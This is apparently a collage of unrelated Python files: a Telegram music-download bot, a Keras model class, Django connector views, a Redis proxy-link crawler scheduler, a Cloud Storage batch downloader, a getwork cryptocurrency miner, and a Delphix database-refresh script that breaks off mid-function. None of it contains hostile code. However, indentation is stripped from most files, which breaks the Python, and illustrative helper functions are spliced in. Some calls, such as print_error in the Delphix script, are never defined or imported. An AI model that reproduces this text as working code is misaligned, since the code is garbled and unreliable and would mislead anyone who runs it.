'too_long':'‼️ *Oops! Video too long to convert!*\n'
'Order something 30 minutes or less.'
}
self.check_input(self.user_input, msg)
pass
def send_message(self, content):
return bot.sendMessage(self.chat_id, content, reply_to_message_id=self.message_id, parse_mode='Markdown')
def delete_message(self, message):
chat_id = message['chat']['id']
message_id = message['message_id']
bot.deleteMessage((chat_id, message_id))
pass
def send_audio(self, file_name):
bot.sendAudio(self.chat_id,audio=open(file_name,'rb'), reply_to_message_id=self.message_id)
pass
def process_request(self, user_input):
result = Music.search_music(self, user_input[6:])
min_duration, split_count = Music.get_duration(self, result)
if int(min_duration) < 30 and split_count < 3:
file_name = Music.get_title(self, result) +' - @TLMusicDownloader_bot '+str(randint(0,999999))+'.mp3'
file_name = file_name.replace('"', '')
self.send_message(f"🎵 {Music.get_title(self, result)}\n🔗 {Music.get_link(self, result)}")
downloading_message = self.send_message('⬇️ Downloading... \n_(this may take a while.)_')
Music.download_music(self, file_name, Music.get_link(self, result))
try:
self.send_audio(file_name)
self.delete_message(downloading_message)
                self.send_message('✅ Success!')
                print("\nSuccess!\n")
except:
print("\nError")
os.remove(file_name)
pass
def check_input(self, user_input, msg):
if user_input.startswith('/start'):
self.send_message(self.messages['start'])
elif user_input.startswith('/music') and user_input[6:]!='':
if 'open.spotify.com' in user_input[6:]:
self.send_message(self.messages['spotify_input_error'])
else:
#Valid command
self.process_request(user_input)
else:
#Invalid command
self.send_message(self.messages['invalid_command'])
pass
def start_new_chat(msg):
Process(target=Chat, args=(msg,)).start()
bot.message_loop(start_new_chat, run_forever=True)
|
model.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the strategy class."""
import logging
import threading
from pathlib import Path
from tensorflow import keras
from aea.skills.base import Model
DEFAULT_MODEL_CONFIG_PATH = str(Path("..", "..", "model.config").resolve())
logger = logging.getLogger("aea.gym_skill")
class MLModel(Model):
"""This class defines a machine learning model."""
def __init__(self, **kwargs):
"""Initialize the machine learning model."""
self._model_config_path = kwargs.pop(
"model_config_path", DEFAULT_MODEL_CONFIG_PATH
)
super().__init__(**kwargs)
        # TODO: this at the moment does not work - need to compile the model according to the network configuration
# A better alternative is to save/load in HDF5 format, but that might require some system level dependencies
# https://keras.io/getting-started/faq/#how-can-i-install-hdf5-or-h5py-to-save-my-models-in-keras
# self._model = keras.Model.from_config(json.load(open(self._model_config_path)))
self._model = keras.Sequential(
[
keras.layers.Flatten(input_shape=(28, 28)),
keras.layers.Dense(128, activation="relu"),
keras.layers.Dense(10, activation="softmax"),
]
)
self._model.compile(
optimizer="adam",
loss="sparse_categorical_crossentropy",
metrics=["accuracy"],
)
self._lock = threading.Lock()
def fit(self, *args, **kwargs):
"""Fit a model."""
with self._lock:
return self._model.fit(*args, **kwargs)
def predict(self, *args, **kwargs):
"""Predict."""
with self._lock:
return self._model.predict(*args, **kwargs)
def evaluate(self, *args, **kwargs):
"""Predict."""
with self._lock:
return self._model.evaluate(*args, **kwargs)
def save(self):
"""Save the model weights."""
# TODO to implement.
def _update(self, X, y, epochs):
"""Update the ML model."""
logger.info("Start training with {} rows".format(X.shape[0]))
self.fit(X, y, epochs=epochs)
loss, acc = self.evaluate(X, y, verbose=2)
logger.info("Loss: {}, Acc: {}".format(loss, acc))
def update(self, X, y, epochs):
"""Update the ML model."""
        thread = threading.Thread(target=self._update, args=[X, y, epochs])
thread.start()
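# --- Hedged usage sketch (added for illustration, not part of the original skill) ---
# Demonstrates the input shapes MLModel expects: 28x28 images and integer labels 0-9,
# matching the hard-coded Sequential network above. The random data and the way the
# model instance is obtained are assumptions for illustration only.
def _example_update(ml_model: "MLModel") -> None:
    import numpy as np
    X = np.random.rand(32, 28, 28).astype("float32")   # 32 fake grayscale images
    y = np.random.randint(0, 10, size=(32,))            # 32 fake class labels
    ml_model.update(X, y, epochs=1)                      # training runs on a background thread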
|
views.py
|
import json
import os
import time
import subprocess
import threading
import requests
from connector_api.models import Connector, ConnectorApp
from django.conf import settings
from django.shortcuts import render, redirect
from django.http import JsonResponse
from connector_api.serializers import ConnectorSerializer
from django.forms.models import model_to_dict
def home(request):
connectors = Connector.objects.all()
connector_apps = ConnectorApp.objects.all()
return render(request, "connection.html", {'connectors':connectors, 'connector_apps': connector_apps})
def start_connector(request):
response = redirect('/')
data = {
'connector_type': 'consumer',
'paired_connector': request.POST['provider'],
'connector_app': request.POST['connector']
}
connector_app = ConnectorApp.objects.get(name=data['connector_app'])
if connector_app.name == 'gsheets':
script_path = 'scripts/video-lib-connector/run-consumer-gsheet.sh'
elif connector_app.name == 'display':
script_path = 'scripts/video-lib-connector/run-consumer-display.sh'
else:
script_path = 'scripts/video-lib-connector/run-consumer-display.sh'
create_connector = ConnectorSerializer(data=data, many=isinstance(data, list))
if create_connector.is_valid():
create_connector.save()
message = "Created connectors successfully."
else:
message = "Could not create connectors successfully."
errors = create_connector.errors
print(errors)
print(message)
run_script(script_path)
if connector_app.name == 'gsheets':
t = threading.Thread(target=configure_gsheets,args=(request.POST,), kwargs={})
        t.daemon = True
t.start()
return response
def run_script(script_path):
try:
pid = os.fork()
    except Exception as e:
        print(e)
        return
if pid == 0:
#create connector
subprocess.call([script_path])
print(os.getpid())
os._exit(0)
def configure_gsheets(config):
form_data = {
'sheet_title': config['sheet_title'],
'email': config['email'],
}
retry_count = 0
max_retry_count = 10
while(True):
time.sleep(5)
try:
r = requests.post('http://localhost:3001/configure/', data=form_data)
if r.status_code == 200:
break
else:
retry_count = retry_count+1
if retry_count > max_retry_count:
break
except:
retry_count = retry_count+1
if retry_count > max_retry_count:
break
time.sleep(55)
print('Retrying...')
def check_connector_status(connectors):
connectors = Connector.objects.all()
con_to_return = []
for connector in connectors:
try:
r = requests.get('http://localhost:'+connector.connector_app.port)
if(r.status_code == 200):
connector.status = 'active'
else:
connector.status = 'inactive'
except:
connector.status = 'inactive'
connector.save()
con_to_return.append({
'id': connector.id,
'status': connector.status,
'connector_app': connector.connector_app.name
})
return JsonResponse(con_to_return, safe=False)
def con_status(request):
connectors = Connector.objects.all()
return render(request, "status.html", context={"connectors": connectors})
def stop_connector(request):
try:
connector = Connector.objects.filter(id=request.GET['id'])[0]
connector_app = connector.connector_app
if connector_app.name == 'gsheets':
script_path = 'scripts/video-lib-connector/stop-consumer-gsheet.sh'
elif connector_app.name == 'display':
script_path = 'scripts/video-lib-connector/stop-consumer-display.sh'
else:
script_path = 'scripts/video-lib-connector/stop-consumer-display.sh'
run_script(script_path)
connector.delete()
except Exception as e:
print(e)
return redirect('/')
def log(request):
provider_logs_top_100 = []
consumer_logs_top_100 = []
print(settings.BASE_DIR)
consumer_log_path = os.path.join(settings.FILES_DIR, "consumer/app.json")
provider_log_path = os.path.join(settings.FILES_DIR, "provider/app.json")
try:
with open(consumer_log_path, "r") as ofs:
consumer_logs_top_100 = ofs.readlines()
file_length = len(consumer_logs_top_100)
consumer_logs_top_100 = consumer_logs_top_100[file_length-100:]
except:
print("folder not creater for logs")
try:
with open(provider_log_path, "r") as ofs:
provider_logs_top_100 = ofs.readlines()
file_length = len(provider_logs_top_100)
provider_logs_top_100 = provider_logs_top_100[file_length-100:]
except:
print("folder not creater for logs")
return render(request, "logs.html", context={"provider_logs_top_100": provider_logs_top_100, "consumer_logs_top_100": consumer_logs_top_100})
|
deploy.py
|
__all__ = ['GeventSchedule']
import time
import threading
import schedule
from BusinessCentralLayer.middleware.redis_io import *
from BusinessCentralLayer.sentinel import noticer
from BusinessLogicLayer.cluster import __task__
from config import REDIS_SECRET_KEY, SINGLE_TASK_CAP, CRAWLER_SEQUENCE, ENABLE_COROUTINE, LAUNCH_INTERVAL, logger
class GeventSchedule(object):
def __init__(self, go: bool = ENABLE_COROUTINE, deploy_cluster=CRAWLER_SEQUENCE, cap=SINGLE_TASK_CAP,
crontab=LAUNCH_INTERVAL):
        # Task queue
        self.deploy_cluster = deploy_cluster
        # Coroutine acceleration
        self.go = go
        # Per-node collection cap
        self.cap = cap
        # Task interval (minutes)
        self.crontab = crontab
        # Connect to the cluster
        self.rc = RedisClient()
        self.rc_len = dict(zip(self.deploy_cluster, [1] * len(self.deploy_cluster)))
def push_task(self, task_name: str) -> bool:
"""
@param task_name:
@return:
"""
        # The input parameter has the wrong data type
if not isinstance(task_name, str):
logger.error(f'The input type is wrong({task_name})')
return False
        # The input parameter is not in the allowed task set
        if task_name not in self.deploy_cluster:
            logger.error(f'Spelling error in input ({task_name}), please choose from {self.deploy_cluster}')
return False
        try:
            # Check whether the buffer queue has reached the per-node collection cap
            task_name = task_name.lower()
            self.rc_len[f'{task_name}'] = self.rc.__len__(REDIS_SECRET_KEY.format(f'{task_name}'))
            logger.info(f'[TEST] || Checking the ({task_name}) task queue...')
            # If the cap has been reached or exceeded, put the task to sleep
            if self.rc_len[f"{task_name}"] >= self.cap:
                logger.debug(f'[SLEEP] || Task queue is full ({task_name}) ({self.rc_len[f"{task_name}"]}/{self.cap})')
                return True
        finally:
            # Run ddt once, whether or not the queue is full
            self.ddt(class_=task_name)
        try:
            # Run the collection task; self.go decides whether coroutine acceleration is used
            logger.info(f'[RUN] || ({task_name}) collection task started')
            __task__.loads_task(task_name, self.go)
            # Check whether the task failed completely, i.e. every collection attempt for this link type failed -> Abnormal
            if self.rc.__len__(REDIS_SECRET_KEY.format(f'{task_name}')) < self.rc_len[f'{task_name}']:
                logger.error(f'[CRITICAL] Abnormal collection task ({task_name})')
            else:
                return True
        except Exception as e:
            # Catch unknown errors
            logger.error(f'[ERROR]{self.__class__.__name__}({task_name}) crawler engine panic {e}')
        finally:
            # Collection for this link type has finished
            logger.success('[OVER] || Task finished {}({})'.format(self.__class__.__name__, task_name))
@logger.catch()
def run_check(self, class_: str) -> None:
"""
启动任务:以非部署模式,传递参数
@param class_:
--传入的应是 config 中 crawler seq中的参数,如`v2ray`/`ssr`/`trojan`
--确保操作的原子性,不要一次性传入多个参数,
--正确的做法是通过<协程引擎>的消息队列形式驱动多任务
--或使用for迭代work_seq顺序驱动多任务
@return:
"""
__task__.loads_task(class_, self.go, startup=False, loads_=True)
# self.push_task(class_)
def ddt(self, class_: str = None) -> None:
"""
@param class_: subscribe type `ssr` or `v2ray` or `trojan` ...
@return:
"""
if class_ is None:
for item in self.deploy_cluster:
threading.Thread(target=RedisDataDisasterTolerance().run, args=(item,)).start()
elif isinstance(class_, str) and class_ in self.deploy_cluster:
RedisDataDisasterTolerance().run(class_)
else:
            logger.warning('{}.ddt() received an invalid argument: wrong type or not in the crawler_seq work queue'.format(self.__class__.__name__))
def run(self) -> None:
# logger.warning('This is a development server. Do not use it in a production deployment.')
try:
for task_name in self.deploy_cluster:
try:
schedule.every(self.crontab['action']).minutes.do(self.push_task, task_name=task_name)
schedule.every(self.crontab['refresh']).minutes.do(self.rc.refresh,
key_name=REDIS_SECRET_KEY.format(task_name))
logger.info(f"start {task_name}/crontab:{self.crontab['action']} minutes")
except schedule.IntervalError:
logger.error('interval set error')
self.crontab['action'] += 5
while True:
schedule.run_pending()
time.sleep(1)
except Exception as err:
logger.exception('Exception occurred ||{}'.format(err))
noticer.send_email(text_body='{}'.format(err), to='self')
except KeyboardInterrupt as err:
logger.stop('Forced stop ||{}'.format(err))
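# --- Hedged usage sketch (added for illustration, not part of the original module) ---
# Pushes every configured task once, outside the schedule.every() loop in run().
# All names come from the config module imported above; only this helper is an addition.
def example_push_all_once():
    scheduler = GeventSchedule(go=ENABLE_COROUTINE, deploy_cluster=CRAWLER_SEQUENCE,
                               cap=SINGLE_TASK_CAP, crontab=LAUNCH_INTERVAL)
    for task_name in scheduler.deploy_cluster:
        scheduler.push_task(task_name)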
if __name__ == '__main__':
GeventSchedule().run()
|
download_batch_files.py
|
import logging
import threading
from config import BaseConfig
from google.cloud.storage import Client as GSClient, Blob
def download_batch_into_memory(batch, bucket, inclue_metadata=True, max_threads=BaseConfig.MAX_THREADS_TO_DOWNLOAD_FILES):
"""Given a batch of storage filenames, download them into memory.
Downloading the files in a batch is multithreaded.
:param batch: A list of gs:// filenames to download.
:type batch: list of str
    :param bucket: The Google Cloud Storage bucket to download from.
    :type bucket: google.cloud.storage.bucket.Bucket
    :param inclue_metadata: True to include metadata.
:type inclue_metadata: bool
:param max_threads: Number of threads to use for downloading batch. Don't increase this over 10.
:type max_threads: int
:return: Complete blob contents and metadata.
:rtype: dict
"""
def download_blob(blob_name, state):
"""Standalone function so that we can multithread this."""
blob = bucket.blob(blob_name=blob_name)
content = blob.download_as_bytes() # json.loads(blob.download_as_string())
state[blob_name] = content
batch_data = {bn: {} for bn in batch}
threads = []
active_thread_count = 0
for blobname in batch:
thread = threading.Thread(target=download_blob, kwargs={"blob_name": blobname, "state": batch_data})
threads.append(thread)
thread.start()
active_thread_count += 1
if active_thread_count == max_threads:
# finish up threads in batches of size max_threads. A better implementation would be a queue
            # from which the threads can feed, but this is good enough if the blob sizes are roughly the same.
for thread in threads:
thread.join()
threads = []
active_thread_count = 0
# wait for the last of the threads to be finished
for thread in threads:
thread.join()
return batch_data
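# --- Hedged usage sketch (added for illustration, not part of the original module) ---
# Shows how download_batch_into_memory might be called: open a storage client, fetch a
# bucket, and pass a list of blob names. The bucket and blob names are placeholders.
def example_download_batch():
    client = GSClient()                                          # uses default credentials
    bucket = client.bucket("example-bucket")                     # placeholder bucket name
    blob_names = ["blocks/000001.json", "blocks/000002.json"]    # placeholder blob names
    contents = download_batch_into_memory(blob_names, bucket)
    # contents maps blob name -> downloaded bytes
    return {name: len(data) for name, data in contents.items()}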
def download_batch_into_files(batch, bucket, inclue_metadata=True,
folder_path=BaseConfig.BLOCK_DIR, max_threads=BaseConfig.MAX_THREADS_TO_DOWNLOAD_FILES):
"""Given a batch of storage filenames, download them into memory.
Downloading the files in a batch is multithreaded.
:param batch: A list of gs:// filenames to download.
:type batch: list of str
    :param bucket: The Google Cloud Storage bucket to download from.
    :type bucket: google.cloud.storage.bucket.Bucket
    :param inclue_metadata: True to include metadata.
:type inclue_metadata: bool
:param max_threads: Number of threads to use for downloading batch. Don't increase this over 10.
:type max_threads: int
:return: Complete blob contents and metadata.
:rtype: dict
"""
def download_blob_to_file(blob_name, state):
"""Standalone function so that we can multithread this."""
blob = bucket.blob(blob_name=blob_name)
        if blob.exists():  # and blob.size > 0 and isinstance(blob, Blob)
            destination_uri = '{}/{}'.format(folder_path, blob.name.split('/')[1])
            blob.download_to_filename(destination_uri)
            state[blob_name] = 1
else:
            logging.warning('Block file not found: {0}'.format(blob_name))
batch_data = {bn: {} for bn in batch}
threads = []
active_thread_count = 0
for blobname in batch:
thread = threading.Thread(target=download_blob_to_file, kwargs={"blob_name": blobname, "state": batch_data})
threads.append(thread)
thread.start()
active_thread_count += 1
if active_thread_count == max_threads:
# finish up threads in batches of size max_threads. A better implementation would be a queue
            # from which the threads can feed, but this is good enough if the blob sizes are roughly the same.
for thread in threads:
thread.join()
threads = []
active_thread_count = 0
# wait for the last of the threads to be finished
for thread in threads:
thread.join()
return batch_data
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Voxels developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class VoxelsRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = VoxelsRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
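# --- Hedged sketch (added for illustration, not part of the original miner) ---
# Restates the proof-of-work test used in Miner.work() for a complete 80-byte header:
# double-SHA256 the header, byte/word reverse the digest, and compare it to the target
# as a 256-bit integer. The helper name is an addition; the transforms come from above.
def example_check_header(header_80_bytes, target):
    hash_bin = hashlib.sha256(hashlib.sha256(header_80_bytes).digest()).digest()
    hash_bin = wordreverse(bufreverse(hash_bin))
    return long(hash_bin.encode('hex'), 16) < target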
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8332
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
dx_refresh_db.py
|
#!/usr/bin/env python
# DEPRECATED
# Adam Bowen - Apr 2016
# This script refreshes a vdb
# Updated by Corey Brune Oct 2016
# requirements
# pip install --upgrade setuptools pip docopt delphixpy
# The below doc follows the POSIX compliant standards and allows us to use
# this doc to also define our arguments for the script. This thing is brilliant.
"""Refresh a vdb
Usage:
dx_refresh_db.py (--name <name> | --dsource <name> | --all_vdbs [--group_name <name>]| --host <name> | --list_timeflows | --list_snapshots)
[--timestamp_type <type>]
[--timestamp <timepoint_semantic> --timeflow <timeflow>]
[-d <identifier> | --engine <identifier> | --all]
[--debug] [--parallel <n>] [--poll <n>]
[--config <path_to_file>] [--logdir <path_to_file>]
dx_refresh_db.py -h | --help | -v | --version
Refresh a Delphix VDB
Examples:
dx_refresh_db.py --name "aseTest" --group_name "Analytics"
dx_refresh_db.py --dsource "dlpxdb1"
dx_refresh_db.py --all_vdbs --host LINUXSOURCE --parallel 4 --debug -d landsharkengine
dx_refresh_db.py --all_vdbs --group_name "Analytics" --all
Options:
--name <name> Name of the object you are refreshing.
--all_vdbs Refresh all VDBs that meet the filter criteria.
--dsource <name> Name of dsource in Delphix to execute against.
--group_name <name> Name of the group to execute against.
--list_timeflows List all timeflows
--list_snapshots List all snapshots
--host <name> Name of environment in Delphix to execute against.
--timestamp_type <type> The type of timestamp you are specifying.
Acceptable Values: TIME, SNAPSHOT
[default: SNAPSHOT]
--timestamp <timepoint_semantic>
The Delphix semantic for the point in time on
the source from which you want to refresh your VDB.
Formats:
latest point in time or snapshot: LATEST
point in time: "YYYY-MM-DD HH24:MI:SS"
snapshot name: "@YYYY-MM-DDTHH24:MI:SS.ZZZ"
snapshot time from GUI: "YYYY-MM-DD HH24:MI"
[default: LATEST]
--timeflow <name> Name of the timeflow to refresh a VDB
-d <identifier> Identifier of Delphix engine in dxtools.conf.
--engine <type> Alt Identifier of Delphix engine in dxtools.conf.
--all Run against all engines.
--debug Enable debug logging
--parallel <n> Limit number of jobs to maxjob
--poll <n> The number of seconds to wait between job polls
[default: 10]
--config <path_to_file> The path to the dxtools.conf file
[default: ./dxtools.conf]
--logdir <path_to_file> The path to the logfile you want to use.
[default: ./dx_refresh_db.log]
-h --help Show this screen.
-v --version Show version.
"""
from __future__ import print_function
VERSION = "v.0.1.615"
import json
import logging
import sys
import traceback
from os.path import basename
from time import sleep
from time import time
from docopt import docopt
from delphixpy.v1_8_0 import job_context
from delphixpy.v1_8_0.delphix_engine import DelphixEngine
from delphixpy.v1_8_0.exceptions import HttpError
from delphixpy.v1_8_0.exceptions import JobError
from delphixpy.v1_8_0.exceptions import RequestError
from delphixpy.v1_8_0.web import database
from delphixpy.v1_8_0.web import environment
from delphixpy.v1_8_0.web import group
from delphixpy.v1_8_0.web import job
from delphixpy.v1_8_0.web import source
from delphixpy.v1_8_0.web import timeflow
from delphixpy.v1_8_0.web.snapshot import snapshot
from delphixpy.v1_8_0.web.vo import OracleRefreshParameters
from delphixpy.v1_8_0.web.vo import RefreshParameters
from delphixpy.v1_8_0.web.vo import TimeflowPointLocation
from delphixpy.v1_8_0.web.vo import TimeflowPointSemantic
from delphixpy.v1_8_0.web.vo import TimeflowPointTimestamp
from lib.DlpxException import DlpxException
from lib.DxLogging import logging_est
from lib.DxLogging import print_debug
from lib.DxLogging import print_exception
from lib.DxLogging import print_info
from lib.GetReferences import find_obj_by_name
from lib.GetSession import GetSession
def run_async(func):
"""
http://code.activestate.com/recipes/576684-simple-threading-decorator/
run_async(func)
function decorator, intended to make "func" run in a separate
thread (asynchronously).
Returns the created Thread object
E.g.:
@run_async
def task1():
do_something
@run_async
def task2():
do_something_too
t1 = task1()
t2 = task2()
...
t1.join()
t2.join()
"""
from threading import Thread
from functools import wraps
@wraps(func)
def async_func(*args, **kwargs):
func_hl = Thread(target=func, args=args, kwargs=kwargs)
func_hl.start()
return func_hl
return async_func
def find_all_databases_by_dsource_name(
engine, server, dsource_name, exclude_js_container=True
):
"""
Easy way to quickly find databases by dSource
"""
# First search for the dSource name specified and return its reference
dsource_obj = find_obj_by_name(engine, server, database, dsource_name)
if dsource_obj:
return database.get_all(
server,
provision_container=dsource_obj.reference,
no_js_container_data_source=exclude_js_container,
)
def find_all_databases_by_group_name(
engine, server, group_name, exclude_js_container=True
):
"""
Easy way to quickly find databases by group name
"""
# First search groups for the name specified and return its reference
group_obj = find_obj_by_name(engine, server, group, group_name)
if group_obj:
return database.get_all(
server,
group=group_obj.reference,
no_js_container_data_source=exclude_js_container,
)
def find_database_by_name_and_group_name(engine, server, group_name, database_name):
databases = find_all_databases_by_group_name(engine, server, group_name)
for each in databases:
if each.name == database_name:
print_debug(engine["hostname"] + ": Found a match " + str(each.reference))
return each
print_info(
engine["hostname"] + ': Unable to find "' + database_name + '" in ' + group_name
)
def find_snapshot_by_database_and_name(engine, server, database_obj, snap_name):
snapshots = snapshot.get_all(server, database=database_obj.reference)
matches = []
for snapshot_obj in snapshots:
        if str(snapshot_obj.name).startswith(snap_name):
matches.append(snapshot_obj)
if len(matches) == 1:
print_debug(
engine["hostname"] + ": Found one and only one match. This is good."
)
print_debug(engine["hostname"] + ": " + matches[0])
return matches[0]
elif len(matches) > 1:
print_error(
"The name specified was not specific enough. " "More than one match found."
)
for each in matches:
print_debug(engine["hostname"] + ": " + each.name)
else:
print_error("No matches found for the time specified")
print_error("No matching snapshot found")
def find_snapshot_by_database_and_time(engine, server, database_obj, snap_time):
"""
    Find snapshot object by database name and timestamp
engine:
server: A Delphix engine object.
database_obj: The database reference to retrieve the snapshot
    snap_time: timestamp of the snapshot
"""
snapshots = snapshot.get_all(server, database=database_obj.reference)
matches = []
for snapshot_obj in snapshots:
if (
str(snapshot_obj.latest_change_point.timestamp) == snap_time
or str(snapshot_obj.first_change_point.timestamp) == snap_time
):
matches.append(snapshot_obj)
if len(matches) == 1:
snap_match = get_obj_name(server, database, matches[0].container)
print_debug(
engine["hostname"] + ": Found one and only one match. This is good."
)
print_debug(engine["hostname"] + ": " + snap_match)
return matches[0]
elif len(matches) > 1:
print_debug(engine["hostname"] + ": " + matches)
raise DlpxException(
"The time specified was not specific enough."
" More than one match found.\n"
)
else:
raise DlpxException("No matches found for the time specified.\n")
def find_source_by_database(engine, server, database_obj):
# The source tells us if the database is enabled/disables, virtual,
# vdb/dSource, or is a staging database.
source_obj = source.get_all(server, database=database_obj.reference)
# We'll just do a little sanity check here to ensure we only have a
# 1:1 result.
if len(source_obj) == 0:
print_error(
engine["hostname"]
+ ": Did not find a source for "
+ database_obj.name
+ ". Exiting"
)
sys.exit(1)
elif len(source_obj) > 1:
print_error(
engine["hostname"]
+ ": More than one source returned for "
+ database_obj.name
+ ". Exiting"
)
print_error(source_obj)
sys.exit(1)
return source_obj
def get_config(config_file_path):
"""
This function reads in the dxtools.conf file
"""
# First test to see that the file is there and we can open it
try:
config_file = open(config_file_path).read()
except:
print_error(
"Was unable to open "
+ config_file_path
+ ". Please check the path and permissions, then try again."
)
sys.exit(1)
# Now parse the file contents as json and turn them into a
# python dictionary, throw an error if it isn't proper json
try:
config = json.loads(config_file)
except:
print_error(
"Was unable to read "
+ config_file_path
+ " as json. Please check file in a json formatter and "
"try again."
)
sys.exit(1)
# Create a dictionary of engines (removing the data node from the
# dxtools.json, for easier parsing)
delphix_engines = {}
for each in config["data"]:
delphix_engines[each["hostname"]] = each
print_debug(delphix_engines)
return delphix_engines
def job_mode(server):
"""
This function tells Delphix how to execute jobs, based on the
single_thread variable at the beginning of the file
"""
# Synchronously (one at a time)
if single_thread == True:
job_m = job_context.sync(server)
print_debug("These jobs will be executed synchronously")
# Or asynchronously
else:
job_m = job_context.asyncly(server)
print_debug("These jobs will be executed asynchronously")
return job_m
def job_wait():
"""
This job stops all work in the thread/process until all jobs on the
engine are completed.
"""
    # Grab all the jobs on the server (the last 25, by default)
all_jobs = job.get_all(server)
# For each job in the list, check to see if it is running (not ended)
for jobobj in all_jobs:
if not (jobobj.job_state in ["CANCELED", "COMPLETED", "FAILED"]):
print_debug(
"Waiting for "
+ jobobj.reference
+ " (currently: "
+ jobobj.job_state
+ ") to finish running against the container"
)
# If so, wait
job_context.wait(server, jobobj.reference)
def get_obj_name(server, f_object, obj_reference):
